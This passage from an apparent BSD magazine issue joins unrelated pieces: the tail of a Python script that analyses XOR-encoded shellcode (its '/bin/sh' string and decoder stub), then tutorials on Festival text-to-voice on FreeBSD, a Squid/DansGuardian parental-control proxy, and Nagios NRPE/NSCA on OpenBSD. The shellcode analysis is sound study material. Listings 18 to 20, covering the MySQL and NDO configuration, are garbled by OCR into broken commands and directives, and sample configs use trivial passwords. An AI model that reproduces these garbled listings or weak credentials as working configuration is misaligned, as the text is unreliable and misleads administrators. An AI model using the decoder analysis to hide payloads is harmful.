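    what `hexdump -C` lets you spot by eye (here "/bin/sh")."""
    found, start = [], None
    for i, b in enumerate(code + b"\x00"):      # sentinel flushes a final run
        if 0x20 <= b < 0x7F:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                found.append((start, code[start:i].decode("ascii")))
            start = None
    return found


def xor_rolling(code, key0=0xFF):
    """Model of the decoder loop in the self-modifying shellcode: each byte is
    XORed with a key that starts at key0 and is decremented after every byte
    (8-bit wrap-around, like `dec al`). XOR is an involution, so applying this
    to its own output restores the input."""
    out, key = bytearray(), key0 & 0xFF
    for b in code:
        out.append(b ^ key)
        key = (key - 1) & 0xFF
    return bytes(out)


def decode_payload(blob, start, length, key0=0xFF):
    """Return blob with blob[start:start+length] decoded in place, i.e. what
    the stub leaves in memory before the `jmp short` into it (0x17 and 0x4B
    in the sample analysed above)."""
    region = blob[start:start + length]
    return blob[:start] + xor_rolling(region, key0) + blob[start + length:]


if __name__ == "__main__":
    print("NUL bytes at:", null_byte_offsets(SHELLCODE))
    print("strings:", printable_strings(SHELLCODE))
    encoded = xor_rolling(SHELLCODE)
    print("strings once encoded:", printable_strings(encoded))
    # Constructed stand-in for a 0x17-byte decoder stub: NOP padding only.
    blob = b"\x90" * 0x17 + encoded
    print("round trip ok:", decode_payload(blob, 0x17, len(encoded))[0x17:] == SHELLCODE)
```

The encoded copy no longer shows "/bin/sh" to hexdump, which is exactly why the second shellcode in the rsync "exploit" looked harmless at a glance; decode first, then disassemble.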


DANIELE MAZZOCCHIO 


Latest version: http://www.kernel-panic.it/security/shellcode/
How To Convert Text to Voice Using Festival and Lame in FreeBSD

In 2007 I built a web-based IM/Chat service which was later launched as an iPhone web app. Making a long story short, I retired the service in 2008 and that was that.


What you will learn...
• Basic knowledge of iPhone applications


In the summer of 2010 I grew a bit bored of building search based apps, so I decided to brush the dust off the old Bob Chatter code base. After tons of code rewriting and little sleep, Bob Chatter version 1.0.0 IM|Chat for WebOS devices was released. Release 1.0.1 of Bob Chatter includes a service which converts real-time chat instances into voice files. After realizing first hand that there was little documentation regarding FreeBSD and voice technology, I decided to write a tutorial others could learn from. This tutorial will demonstrate how to install the latest version of Festival in FreeBSD and convert text to voice files. By reading this tutorial you will also save yourself 24 hours worth of headache, useless web searching and loads of curse words... After installing the current FreeBSD port festival-1.96_1 (2007) and, as stated above, getting nowhere rather quickly, I decided to download the latest festival-2.0.95-beta (2010) from source.

Figure 1. Downloading source packages into the same directory (terminal listing of festvox_kallpc16k.tar.gz, festvox_rablpc16k.tar.gz, speech_tools-2.0.95-beta.tar.gz and the other tarballs)

What you should know...
• How to install the latest version of Festival in FreeBSD and convert text to voice

This tutorial has been tested on both FreeBSD 7.2-RELEASE and 8.0-RELEASE.

Festival is a brilliant voice synthesizer developed at the 
University of Edinburgh Centre for Speech Technology 
Research. 


Required Festival Packages

• speech_tools-2.0.95-beta.tar.gz: Edinburgh Speech Tools Library
• festival-2.0.95-beta.tar.gz: Festival Speech Synthesis System source
• festlex_POSLEX.tar.gz, festlex_OALD.tar.gz, festlex_CMU.tar.gz: lexicons based on various dictionaries
• festvox_kallpc16k.tar.gz: LPC diphone voice database files (required)
• festvox_rablpc16k.tar.gz, festvox_cmu_us_rms_cg.tar.gz, festvox_cmu_us_slt_arctic_hts.tar.gz, festvox_cmu_us_awb_cg.tar.gz: additional voice files (optional)


Before you begin installing Festival you will need to download the required packages. Note: all packages must be downloaded to the same directory; not doing so will render your installation unusable. In Figure 1, all packages are downloaded to the directory vox (/usr/home/dango/vox). Once all files have been downloaded you can begin to decompress.

gcc -c -fno-implicit-templates -O3 -Wall -DSUPPORT_FREEBSD16 -I../include os2audio.cc
gcc -c -fno-implicit-templates -O3 -Wall -DSUPPORT_FREEBSD16 -I../include macosxaudio.cc
macosxaudio.cc:227:7: warning: no newline at end of file
gcc -c -fno-implicit-templates -O3 -Wall -DSUPPORT_FREEBSD16 -I../include linux_sound.cc
linux_sound.cc:68: warning: deprecated conversion from string constant to 'char*'
linux_sound.cc:866: error: redefinition of 'int freebsd16_supported'
linux_sound.cc:66: error: 'int freebsd16_supported' previously defined here
linux_sound.cc:867: error: redefinition of 'int linux16_supported'
linux_sound.cc:67: error: 'int linux16_supported' previously defined here
linux_sound.cc:68: warning: 'aud_sys_name' defined but not used
gmake[1]: *** [linux_sound.o] Error 1
gmake: *** [audio] Error 2

Figure 2. Installation errors during compiling


Festival installation

After downloading the required packages it is time to install. Note: since the only feature of Festival needed for our system was text2wave, I did no testing of Festival's capabilities with sound cards. Note: you must compile speech_tools before any other source.


tar zxvf speech_tools-2.0.95-beta.tar.gz
cd speech_tools
./configure
gmake


During gmake, the errors depicted in the screenshot (Figure 2) will occur unless you make the changes addressed in Figure 3. Once speech_tools has successfully compiled, follow by compiling the festival source.


Figure 3. Commenting out unneeded lines 66-68 and 78-80 of speech_tools/audio/linux_sound.cc (the duplicate int freebsd16_supported, int linux16_supported and static char *aud_sys_name definitions inside the SUPPORT_FREEBSD16 and SUPPORT_VOXWARE blocks)
tar zxvf festival-2.0.95-beta.tar.gz
cd festival
./configure
gmake


After successfully compiling the festival source, unpack the remaining required packages:

tar zxvf festlex_CMU.tar.gz
tar zxvf festlex_POSLEX.tar.gz
tar zxvf festvox_kallpc16k.tar.gz

The above will install the necessary lexicon and voice files into the festival directory tree (they unpack under festival/lib).


References

• http://www.cstr.ed.ac.uk/projects/festival/ - Official Festival site
• http://festvox.org/festival - Festival 2.0.95 source download site
• http://www.freebsd.org/ports/index.html - Lame 3.98.4 MP3 encoder
• http://bobchatter.com - Bob Chatter Mobile IM|Chat
Figure 4. Testing the Festival installation, installing Lame and text to voice conversion

Figure 5. Cool implementation of text to voice technology (chat2voice) in the Bob Chatter IM mobile app


For speech_tools to compile successfully I had to disable the following lines: in speech_tools/audio/linux_sound.cc comment out lines 66-68 and 78-80, as shown in Figure 3.


Testing your installation

After all the previous steps have been completed the killer stuff begins: testing your installation (Figure 4). Run your favorite editor, create hello.txt with whatever text and save it. Run the following command:

./text2wave hello.txt -o hello.wav

On a successful install a hello.wav file will be created. Since .wav files are huge compared to .mp3 encoded files, I will install Lame from /usr/ports/audio/lame. Once make install clean is successful, run the following command within your festival/bin directory:

lame hello.wav hello.mp3

In the last screenshot of Figure 4 you will notice the size difference between the hello.wav and hello.mp3 files. Cheers to Lame!

Having read this tutorial you will have a successful 
installation of the latest Festival on FreeBSD and a great 
starting point for implementing voice technology into some 
very cool applications or services. One such example is 
the Chat2Voice in the Bob Chatter mobile app Figure 5. 
Chat2Voice converts real-time chat into voice files. 


DIEGO MONTALVO 

Diego Montalvo is a web/mobile application developer who has developed some interesting concepts. Diego currently resides in Brownsville, Texas but is finding his way back to sunny San Diego, California. The next tutorial will be written from the beach! Great day for a cold pint of Guinness! Enjoy the tutorial. Feel free to contact Diego at diego@earthoid.com
Squid proxy with Parental Controls How-To

Traditionally, web pages were served via a webserver such as Apache and transmitted via the network on port 80 to a web-browser.


What you will learn... 
¢ How to install a Squid proxy with parental controls 


While pages and content were cached in the browser cache, on larger networks it made sense to use a caching proxy such as Squid to reduce external traffic over the net for frequently fetched pages such as Google. This also improved the response of the local network, as traffic only had to reach the local cache to retrieve popular pages. Often, ISPs use other caches on the internet to shape the flow of traffic, and certain countries use a combination of firewalls and proxies with exclusion lists to limit the content delivered to their citizens. This can also be used in reverse, and a competent user can use another proxy elsewhere on a non-standard port, thereby bypassing the original content filter. It is therefore important to lock down the network and monitor for any strange activity when content filtering, unless deep packet inspection is used, which is not always practical.

What you should know...
• How to perform a clean FreeBSD install and configure networking

Figure 1. Squid setup screen on Webmin

There are a number of ways of configuring Squid to intercept port 80 traffic: as a stand-alone proxy, or as a transparent proxy. In the former scenario, for all traffic to pass through the proxy each client must be configured to use Squid, which on large networks with many clients can be time consuming if it is not centralised, e.g. by using a proxy.pac file. This method also has the drawback that the user can disable the proxy settings, and if the network is not secure, any HTTP traffic will then leave unmonitored via the default gateway. A better solution would be to use Squid in transparent mode, and to redirect all port 80 traffic to the proxy. This also has disadvantages, in that the proxy will need to have dual network interfaces and the network router/firewall will have to be reconfigured to redirect all port 80 traffic to the Squid box. As this How-to was inspired by locking down my home network for my daughter, I have gone for the former method, but there is no reason Squid could not be adapted to be a transparent proxy: all that would be required is to add firewall support to the FreeBSD kernel and IPFW/PF transparent support for Squid. Some additional tuning would be required to pass the traffic through DansGuardian and Privoxy after Squid, but the principle would remain the same.

Squid executable: /usr/local/sbin/squid
Full path to PID file: /usr/local/squid/logs/squid.pid
Full path to squid cache directory: /var/squid/cache
Squid cachemgr.cgi executable: /usr/local/libexec/squid/cachemgr.cgi
Full path to squid log directory: /var/squid/logs

Figure 2. Squid module config screen on Webmin

We will be using DansGuardian and Privoxy for content filtering. DansGuardian is free to use in a personal, government or educational environment, but a licence needs to be purchased for commercial use. If a totally free solution is preferred, SquidGuard could be used instead. Webmin is very useful as it will allow us to view cache statistics via a browser, and easily add restrictions to DansGuardian if desired.

For this demo, | will be using FreeBSD 8.1 i386. 


Installing FreeBSD 
Proceed with a standard FreeBSD install and install the 
ports tree, configure networking using a static IP address, 
add a user account in the wheel group and install any 
utilities and patches that you favour, such as Midnight 
Commander (mc) and portaudit etc. 

In this install, the IP address of transproxy (transproxy.merville.intranet) is 192.168.0.139.


Install the packages
As root:

pkg_add -r wget webmin squid privoxy

Set up and follow the prompts from the script, then start Webmin:

/usr/local/lib/webmin/setup.sh
/usr/local/etc/rc.d/webmin onestart

Create the squid cache directories and start Squid:

/usr/local/sbin/squid -z
/usr/local/etc/rc.d/squid onestart

Add the following to your hosts file:

192.168.0.139 transproxy transproxy.merville.intranet


Configuring Squid
Log in to Webmin on port 10000 and browse to Servers/Squid Proxy Server: see Figure 1.

Amend the paths in Module Config to the following: see Figure 2.

Open a browser, and use 192.168.0.139 port 3128 as the proxy. Add 192.168.0.139 to ignored hosts, and you should be able to freely browse the internet, with the traffic visible in /var/squid/logs/access.log. If you access the Cache Manager Statistics (username/password squid) and drill down to the Cache Client Lists you will also see the hit ratio etc.

Figure 3. Squid Ports and Networking screen on Webmin (Proxy addresses and ports: Default (usually 3128) / Listed below)


Installing DansGuardian

mkdir /usr/ports/distfiles
cd /usr/ports/distfiles
wget http://dansguardian.org/downloads/2/Stable/dansguardian-2.10.1.1.tar.gz
cd /usr/ports/www/dansguardian
make install clean BATCH=YES


Figure 4. Data flow through the proxy: browser HTTP data flow using multiple filters (Privoxy strips nuisance ads) out to the web content
Figure 5. Client browser proxy settings (manual proxy configuration, HTTP proxy 192.168.0.139, ignored hosts)


If you require extensive control over DansGuardian, 
download the DansGuardian Webmin module from 
sourceforge.net and install via the Webmin Modules 
link. You will have to modify the paths and directory 
permissions to reflect the FreeBSD install. 

Tune the configuration file /usr/local/etc/dansguardian/dansguardian.conf:

filterip = 192.168.0.139
filterport = 3129
proxyip = 192.168.0.139
proxyport = 8118
daemonuser = 'nobody'
daemongroup = 'nobody'
loglocation = '/var/log/dg/dg.log'
statlocation = '/var/log/dg/dg.stats'
accessdeniedaddress = 'http://transproxy/cgi-bin/dansguardian.pl'

Figure 6. Squid log

Figure 7. Privoxy log (header scan of a GET http://www.playboy.com/ request relayed via transproxy.merville.intranet:3128, squid/2.7.STABLE9)

cd /var/log
mkdir dg
chown root:nobody dg
chmod 770 dg

/usr/local/etc/rc.d/dansguardian onestart


Modify Squid so it only listens on 127.0.0.1:3128: see Figure 3.

Open the /usr/local/etc/privoxy/config file and change the listen address to match the following:

listen-address 192.168.0.139:8118

Figure 8. DansGuardian log (requests from 192.168.0.126 with method, size, naughtiness score, HTTP status and MIME type)
Add a forward statement to push Privoxy's output through Squid:

forward / 127.0.0.1:3128


Enable (uncomment) the following debug lines so we can monitor the traffic:

debug 1
debug 1024
debug 4096
debug 8192


Add the following lines to rc.conf so all services will start on boot:

squid_enable="YES"
privoxy_enable="YES"
dansguardian_enable="YES"
webmin_enable="YES"


Change the proxy on your client from port 3128 to 3129. Ensure everything starts OK:

/usr/local/etc/rc.d/squid onestop
/usr/local/etc/rc.d/dansguardian onestart
/usr/local/etc/rc.d/privoxy onestart
/usr/local/etc/rc.d/squid onestart

In three separate terminals, view the outgoing traffic:

tail -f /var/log/dg/dg.log
tail -f /var/squid/logs/access.log
tail -f /var/log/privoxy/logfile


You should now have a cached, content filtered proxy 
with advert removal. Reboot the box. 


Figure 9. Privoxy GUI ("This is Privoxy 3.0.16 on transproxy (192.168.0.139), port 8118, enabled")
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Final testing and additional tweaks 
Checks: 


• Go to a site with lots of adverts. Most of these should be removed by Privoxy. Ensure NoScript/Adblock is turned off if you are running Firefox etc.
• Go to a known bad site, e.g. playboy.com, and ensure the content is filtered.
• Go to a known good site and ensure all content downloads OK.

The following improvements would be beneficial:

1. Lock down Privoxy so only DansGuardian can access it (it is the only component that should talk to port 8118); this can be done via the config file or using a firewall rule.
2. Automate the retrieval of the latest blacklists and phrase-lists from dansguardian and blacklist.org.
3. Add further ACLs to Squid to prevent access after 8:00 pm etc. on certain PCs.
4. Tune the exception lists / sensitivity of the proxies to your own taste.
5. Handle HTTPS traffic better.
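One way to turn the log-watching step into a check, as an added example in Python that is not part of the original How-to: given Squid's native access.log, flag requests whose client is not the loopback address (with Squid bound to 127.0.0.1:3128, only Privoxy should ever reach it, so any other client means the DansGuardian/Privoxy chain was bypassed) and CONNECT tunnels, which carry the HTTPS traffic improvement 5 refers to and which the phrase and URL filters cannot inspect. The log lines are constructed samples, the peer addresses are from the 192.0.2.0/24 documentation range, and the loopback-only assumption is the one the configuration above sets up.

```python
"""Audit Squid's native access.log for requests that did not come through the
DansGuardian -> Privoxy -> Squid chain, and for CONNECT tunnels the content
filter cannot inspect."""
from collections import Counter

# Constructed sample in Squid's native log format, one request per line:
#   timestamp elapsed client action/code bytes method URL ident hierarchy/peer mime
# Peer addresses come from the 192.0.2.0/24 documentation range.
SAMPLE_ACCESS_LOG = """\
1281879265.123    245 127.0.0.1 TCP_MISS/200 5123 GET http://www.example.com/ - DIRECT/192.0.2.10 text/html
1281879266.001     12 127.0.0.1 TCP_HIT/200 2210 GET http://www.example.com/logo.png - NONE/- image/png
1281879270.554    310 192.168.0.126 TCP_MISS/200 7801 GET http://www.playboy.com/ - DIRECT/192.0.2.20 text/html
1281879275.009   1200 127.0.0.1 TCP_MISS/200 0 CONNECT mail.google.com:443 - DIRECT/192.0.2.30 -
1281879280.333     90 192.168.0.126 TCP_MISS/200 0 CONNECT www.playboy.com:443 - DIRECT/192.0.2.20 -
"""

# With Squid bound to 127.0.0.1:3128 and Privoxy forwarding to it, the only
# client Squid should ever log is the loopback address.
TRUSTED_UPSTREAMS = frozenset({"127.0.0.1"})


def parse_native_line(line):
    """Split one native-format line into the fields the audit needs, or
    return None for a line that does not have the ten expected columns."""
    fields = line.split()
    if len(fields) < 10:
        return None
    return {
        "time": float(fields[0]),
        "client": fields[2],
        "status": fields[3],
        "method": fields[5],
        "url": fields[6],
    }


def audit_access_log(log_text, trusted=TRUSTED_UPSTREAMS):
    """Return a (reason, client, method, url) tuple for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_native_line(line)
        if rec is None:
            continue
        if rec["client"] not in trusted:
            # The request reached Squid without passing DansGuardian and Privoxy.
            findings.append(("bypassed filter chain", rec["client"], rec["method"], rec["url"]))
        if rec["method"] == "CONNECT":
            # An HTTPS tunnel: Squid relays opaque bytes, so the phrase and
            # URL filters never see what is inside.
            findings.append(("unfiltered HTTPS tunnel", rec["client"], rec["method"], rec["url"]))
    return findings


def summarise(findings):
    """Count findings per (reason, client) so a persistent offender stands out."""
    return Counter((reason, client) for reason, client, _method, _url in findings)


if __name__ == "__main__":
    hits = audit_access_log(SAMPLE_ACCESS_LOG)
    for reason, client, method, url in hits:
        print(f"{reason:24} {client:15} {method:8} {url}")
    for (reason, client), n in summarise(hits).items():
        print(f"{n} x {reason} from {client}")
```

Run it against the real /var/squid/logs/access.log from a cron job; a single "bypassed filter chain" line means a client found a way round port 3129, and a steady stream of CONNECT entries is the measure of how much traffic the filter never sees.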


ROB SOMERVILLE 

Rob Somerville has been passionately involved with technology 
both as an amateur and professional since childhood. 
A passionate convert to *BSD, he stubbornly refuses to shave 
off his beard under any circumstances. Fortunately, his wife 
understands him (she was working as a System/36 operator 
when they first met). The technological passions of their 
daughter and numerous pets are still to be revealed. 
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Network monitoring 


So our OpenBSD-based network now includes redundant firewalls (http:// 
www.kernel-panic.it/openbsd/carp/index.html), domain name servers 
(http://www.kernel-panic.it/openbsd/dns/index.html), a mail gateway 
(http://www.kernel-panic.it/openbsd/mail/index.html) and a web proxy 
cache (http://www.kernel-panic.it/openbsd/proxy/index.html). 


What you will learn...
• Installing Nagios
• How to monitor a network with Nagios and OpenBSD


One of Nagios' key features is its extensibility; new functionality can be easily added thanks to its plugin-based architecture, the external command interface and the Apache (http://httpd.apache.org/) web server. In this chapter, we will take a look at a few common issues that can be addressed with some of the most popular addons (http://www.nagiosexchange.org/) for Nagios.


NRPE 

Suppose you want Nagios to monitor local services on remote hosts, such as disk space usage, system load or the number of users currently logged in. These are not network services, so they can't be directly checked with standard plugins: what we would need is some kind of agent to install on remote systems that Nagios could periodically query for the status of local services. Well, that's exactly what the Nagios Remote Plugin Executor (NRPE, http://www.nagiosexchange.org/cgi-bin/page.cgi?g=Detailed/1556.html;d=1) does: it allows you to execute local plugins on remote hosts! It is made up of two components:

• an agent, running (either standalone or under inetd(8), http://www.openbsd.org/cgi-bin/man.cgi?query=inetd&sektion=8) on the monitored host, which waits for incoming connections, executes the requested checks and returns the status of the local services;
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What you should know... 
¢- Agood knowledge of OpenBSD administration 
¢ Basic MySQL database administration 


• a plugin, check_nrpe, used by Nagios to query the remote agents.


Both the agent and the plugin are available from the 
following package: 


nrpe-x.x.tgz


In addition, the Nagios plugins package will be installed on the monitored host as a dependency: this will allow the NRPE agent to take advantage of the standard Nagios plugins to perform local checks. The package installation automatically creates the _nrpe user and group that the daemon will run as and copies a sample nrpe.cfg configuration file into /etc/: see Listing 16. To run NRPE as a standalone daemon, simply type:

# /usr/local/sbin/nrpe -c /etc/nrpe.cfg -d

and add the following lines to /etc/rc.local to start it automatically after reboot:

/etc/rc.local
if [ -x /usr/local/sbin/nrpe ]; then
    echo -n ' nrpe'
    /usr/local/sbin/nrpe -c /etc/nrpe.cfg -d
fi
/etc/nrpe.cfg

# The syslog facility that should be used for logging purposes
log_facility=daemon
# Path to the pid file (ignored if running under inetd)
pid_file=/var/run/nrpe.pid
# Address to bind to, to avoid binding on all interfaces (ignored if running
# under inetd)
server_address=<monitored host address>
# Port to wait connections on (ignored if running under inetd)
server_port=5666
# User and group the NRPE daemon should run as (ignored if running under inetd)
nrpe_user=_nrpe
nrpe_group=_nrpe
# Comma-delimited list of IP addresses or hostnames that are allowed to connect
# to the NRPE daemon (ignored if running under inetd)
allowed_hosts=127.0.0.1,172.16.0.14
# Don't allow clients to specify arguments to commands that are executed
dont_blame_nrpe=0
# Uncomment the following option to prefix all commands with a specific string
#command_prefix=/usr/bin/sudo
# Don't log debugging messages to the syslog facility
debug=0
# Maximum length (in seconds) of executed plugins
command_timeout=60
# Command definitions are in the form
#
#   command[<command_name>]=<command_line>
#
# Thus, when the NRPE daemon receives a request to execute the command
# "command_name", it will run the local script specified by "command_line".
# Note: macros are NOT allowed within command definitions
command[check_users]=/usr/local/libexec/nagios/check_users -w 5 -c 10
command[check_load]=/usr/local/libexec/nagios/check_load -w 15,10,5 -c 30,25,20
command[check_disk1]=/usr/local/libexec/nagios/check_disk -w 20 -c 10 -p /dev/wd0a
command[check_total_procs]=/usr/local/libexec/nagios/check_procs -w 150 -c 200

Listing 16. The sample configuration file copied by the package installation


Listing 17. Editing the NSCA configuration file


/etc/nsca.cfg
# Path to the pid file (ignored if running under inetd)
pid_file=/var/run/nsca.pid
# Address to bind to (optional)
server_address=172.16.0.14
# Port to wait connections on
server_port=5667
# User and group the NSCA daemon should run as (ignored if running under inetd)
nsca_user=_nagios
nsca_group=_nagios
# chroot(2) directory for the NSCA daemon
nsca_chroot=/var/www/var/nagios/rw
# Don't log debugging messages to the syslog facility
debug=0
# Path to the command file (relative to the chroot directory)
command_file=nagios.cmd
# File where to dump service check results if the command file does not exist
alternate_dump_file=nsca.dump
# Do not aggregate writes to the external command file
aggregate_writes=0
# Open the external command file in write mode
append_to_file=0
# Maximum packet age (in seconds)
max_packet_age=30
# Password to use to decrypt incoming packets
password=password
# Decryption method (16 = RIJNDAEL-256). It must match the encryption method
# used by the client
decryption_method=16
Alternatively, you can run NRPE under inetd(8) (http://www.openbsd.org/cgi-bin/man.cgi?query=inetd&sektion=8) by adding the following line in /etc/inetd.conf(8) (http://www.openbsd.org/cgi-bin/man.cgi?query=inetd.conf&sektion=8):

/etc/inetd.conf
nrpe stream tcp nowait _nrpe:_nrpe /usr/local/sbin/nrpe nrpe -c /etc/nrpe.cfg -i

and by adding the nrpe service in /etc/services(5) (http://www.openbsd.org/cgi-bin/man.cgi?query=services&sektion=5):

/etc/services
nrpe 5666/tcp # Nagios Remote Plugin Executor

and then send the inetd(8) daemon the hangup signal, instructing it to re-read its configuration:

# pkill -HUP inetd


Now, on the Nagios server, you can perform checks using NRPE simply by defining commands such as the following (only make sure that the command name passed to the -c option has a corresponding command definition in the nrpe.cfg file on the remote host!):

/var/www/etc/nagios/commands.cfg
define command {
    command_name    check-disk1-nrpe
    command_line    $USER1$/check_nrpe -H $HOSTADDRESS$ -c check_disk1
}


NSCA 

Now suppose you want to monitor the correct execution of a process on a remote host, like a scheduled backup or a crontab job. This is still a local service, but, unlike disk space usage or system load, it would probably sound more logical to make it the responsibility of the job itself to notify Nagios of its exit status. That's the perfect job for the Nagios Service Check Acceptor (NSCA), which is a daemon program, meant to run on the Nagios server, designed to accept passive service check results from clients.

NSCA is similar to NRPE in that it is made up of a daemon process and a client application, but now the roles are inverted: the daemon process runs on the Nagios server while remote hosts use the send_nsca utility to communicate their status to the daemon. NSCA then forwards the check results to Nagios through the external command interface (so make sure you have enabled external commands in the main configuration file).


Server configuration 

NSCA can run either as a standalone daemon or under inetd(8) (http://www.openbsd.org/cgi-bin/man.cgi?query=inetd&sektion=8). To install the server component we need to add the following packages on the Nagios server:

• mhash-x.x.tgz
• libmcrypt-x.x.tgz
• nsca-x.x.tgz

Next, we need to edit the /etc/nsca.cfg configuration file: see Listing 17. You should set restrictive permissions (600) on the configuration file in order to keep the decryption password protected. To run NSCA as a standalone daemon, simply type:

# /usr/local/sbin/nsca -c /etc/nsca.cfg


and add the following lines to /etc/rc.local to start it automatically after reboot:

/etc/rc.local
if [ -x /usr/local/sbin/nsca ]; then
    echo -n ' nsca'
    /usr/local/sbin/nsca -c /etc/nsca.cfg
fi


Alternatively, you can run it~ under — ineta(s) 
(http://www.openbsd.org/cgi-bin/man.cgi?query=inetd&s 
ektion=8) by adding the following line in /etc/inetd.con£ (8) 
(http://www.openbsd.org/cgi-bin/man.cgi?query=inetd.c 
onf&sektion=8): 


/etc/inetd.conf 


nsca Stream. cp wait _nagios: nagios /usr/ 


local /sbin/nsca nsca -c /etc/nsca.cfg --inetd 

and by adding the nsca service in /etc/services(5) (Attp:// 
www.openbsd.org/cgi-bin/man.cgi?query=services&sek 
tion=5): 


/etc/services 


nsca 5667 / tcp # Nagios Service Check Acceptor 
and then send the inetas) (http:/www.openbsd.org/ 
cgi-bin/man.cgi?query=inetd&sektion=8) daemon the 


hangup signal, instructing it to re-read its configuration: 
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Listing 18. The database creation script 


# cp /usr/local/share/mysgl/my-medium.cnf /etc/my.cnf 

¢ /Usr/10cal/bin/mysG) anstali dp 

Pees. 

# mysqld safe & 

Starting mysqld daemon with databases from /var/mysql 

¢ 7 Web) Iecal/bin7myeq! (secure anecallacion 

eel 

Enter current password for root (enter for none): 
<eMrer 

rea 

Set root password? [Y/n] Y 

New password: root 

Re-enter new password: root 

ete 

Remove anonymous users? [Y/n] Y 

eer al 

Disallow root login remotely? [Y/n] Y 

LOeeasa | 

Remove test database and access to it? [Y/n] Y 

lees 

Reload privilege tables now? [Y/n] Y 

erern| 

# mysql =u root =p 

Password: LOor 

Welcome to the MySQL monitor. Commands end with ; or 
Nee 

Server version: 5.0.5la-log OpenBSD port: mysql-server- 


Sa ole: 


Type “help; ' or ’\h” fox help. Type '\c' to clear the 
buffer. 


mysql> create database nagios; 


Query OK, 1 row affected (0.02 sec) 


mysql> use nagios; 

Database changed 

mysql> \2 -db/mysql asa 

paren 

mysql> GRANT SELECT, INSERT, UPDATE, DELETE ON nagios.* 
TO "ndouser”G' localhost” IDENTIFIED 
BY "ndopasswd*; 

mysql> \G 


Listing 19. Editing the NDOMOD configuration file 


/var/www/etc/nagios/ndomod.cfg 
instance nName-derauly 
SUL CUIL ey pe — Uni xsoeke: 


output=/var/nagios/rw/ndo.sock 


Cubput DuEren a temns—5000 


buffer file=/var/nagios/rw/ndomod. tmp 


DiS LOtarlon interval —Taa00 


HS TCO oOne ~lneoule—o)) 


HEECONNEEE SIN terval ——5 
ceCOnMOeE We cadig | imrermva l= > 
data erocessing opt lons——1 


Contig OULPULL Oe lens— 2 


Listing 20. The NDO2DB configuration file 


/var/www/etc/nagios/ndo2db.cfg 
lock file=/var/run/nagios/ndo2db.lock 


NndoZcb wiser — agile 


ndeZdb group— Nagios 


SCCke eet pe-untx 


socket_name=/var/www/var/nagios/rw/ndo.sock 


diy servertyoe-—mysql 
dbyhest=Vocalnost 
db pOne 5506 

dbo name=nagios 

db prenx—fag tos ) 

db VUser—ndouse: 


do pass=ndopasswd 


max timedevents age=1440 
max systemcommands age=10080 
Max Serv icechocks age—10060 


ax Nes eeneeks vage—1008) 


max eventhandlers age=44640 

debug level—0 

debucn VereostEy =| 

debug _ file=/var/www/var/log/nagios/ndo2db.debug 
Max debug mls oilnze—h)OO000 
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# pkill -HUP inetd 


Client configuration

On the client side, we need to install the following packages:

• libmhash-x.x.x.tgz
• libmcrypt-x.x.x.tgz
• nsca-client-x.x.tgz

and edit the encryption parameters in the /etc/send_nsca.cfg configuration file:

/etc/send_nsca.cfg
# Password to use to encrypt outgoing packets
password=password

# Encryption method (16 = RIJNDAEL-256)
encryption_method=16

The send_nsca utility reads data from standard input and expects, for service checks, a tab separated sequence of host name, service description (i.e. the value of the service_description directive in the service definition), return code and output; e.g.:

# echo "www1\tbackup\t0\tBackup completed successfully" | \
    /usr/local/libexec/nagios/send_nsca -H nagios.kernel-panic.it

and, for host checks, a tab separated sequence of host name, return code and output; e.g.:

# echo "router1\t2\tRouter #1 is down" | \
    /usr/local/libexec/nagios/send_nsca -H nagios.kernel-panic.it

You can override the default delimiter (tab) with send_nsca's -d option. Now, if everything is working fine, each message received by the NSCA daemon should produce a line like the following in the Nagios log file:

/var/www/var/log/nagios/nagios.log
[1167325538] EXTERNAL COMMAND: PROCESS_SERVICE_CHECK_RESULT;www1;backup;0;Backup completed successfully
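As an added example (not the article's or the NSCA project's code), here is a small sh wrapper that runs a cron job and submits its exit status to the NSCA daemon in the tab separated format described above; the send_nsca path and the server name follow the article, while the host, service and job names are constructed placeholders.

```sh
#!/bin/sh
# Added example, not part of the article: wrap a cron job (e.g. a backup)
# and report its exit status to the NSCA daemon as a passive service check.
# Assumed: send_nsca is installed where the article puts it; host, service
# and command names used below are constructed placeholders.

SEND_NSCA="${SEND_NSCA:-/usr/local/libexec/nagios/send_nsca}"
NAGIOS_SERVER="${NAGIOS_SERVER:-nagios.kernel-panic.it}"

# Map a job's exit status to a Nagios return code (see Table 1):
# 0 -> OK (0), "not executable"/"not found" -> UNKNOWN (3), else CRITICAL (2).
exit_to_state() {
    case "$1" in
        0)       echo 0 ;;
        126|127) echo 3 ;;
        *)       echo 2 ;;
    esac
}

# Build the line send_nsca reads on stdin for a service check:
# host<TAB>service description<TAB>return code<TAB>output.
# Tabs and newlines inside the output would be taken as field or record
# separators by the daemon, so they are squeezed to spaces first.
nsca_line() {
    _out=$(printf '%s' "$4" | tr '\t\n' '  ')
    printf '%s\t%s\t%s\t%s\n' "$1" "$2" "$3" "$_out"
}

# Run the job and print the check result line for it.
# Usage: report_job HOST SERVICE command [args...]
report_job() {
    _host=$1; _svc=$2; shift 2
    # The if/else keeps a failing job from aborting a script run with set -e
    if _output=$("$@" 2>&1); then _status=0; else _status=$?; fi
    _last=$(printf '%s\n' "$_output" | tail -n 1)   # last output line only
    _code=$(exit_to_state "$_status")
    case "$_code" in
        0) _msg="OK - ${_last:-$1 completed}" ;;
        3) _msg="UNKNOWN - could not run $1 (exit $_status)" ;;
        *) _msg="CRITICAL - $1 failed (exit $_status): ${_last:-no output}" ;;
    esac
    nsca_line "$_host" "$_svc" "$_code" "$_msg"
}

# When invoked with arguments, run the job and hand the result to send_nsca:
#   nsca_wrap.sh www1 backup /usr/local/bin/run_backup.sh
if [ $# -ge 3 ]; then
    report_job "$@" | "$SEND_NSCA" -H "$NAGIOS_SERVER"
fi
```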


NagVis and NDO

NagVis is a visualization addon for Nagios; it can be used to give users a graphical view (http://www.nagvis.org/doku.php?id=screenshots) of Nagios data. It requires the installation of PHP (http://www.kernel-panic.it/openbsd/nagios/www.php.net/) and a few libraries:

• libxml-x.x.x.tgz
• libiconv-x.x.x.tgz
• jpeg-x.tgz
• png-x.x.x.tgz
• php5-core-x.x.x.tgz
• php5-gd-x.x.x-no_x11.tgz
• mysql-client-x.x.x.tgz
• php5-mysql-x.x.x.tgz

Apache is already up and running, so we only need to enable the php modules we have just installed:

# ln -s /var/www/conf/modules.sample/php5.conf /var/www/conf/modules
# ln -fs /var/www/conf/php5.sample/gd.ini /var/www/conf/php5/gd.ini
# ln -fs /var/www/conf/php5.sample/mysql.ini /var/www/conf/php5/mysql.ini

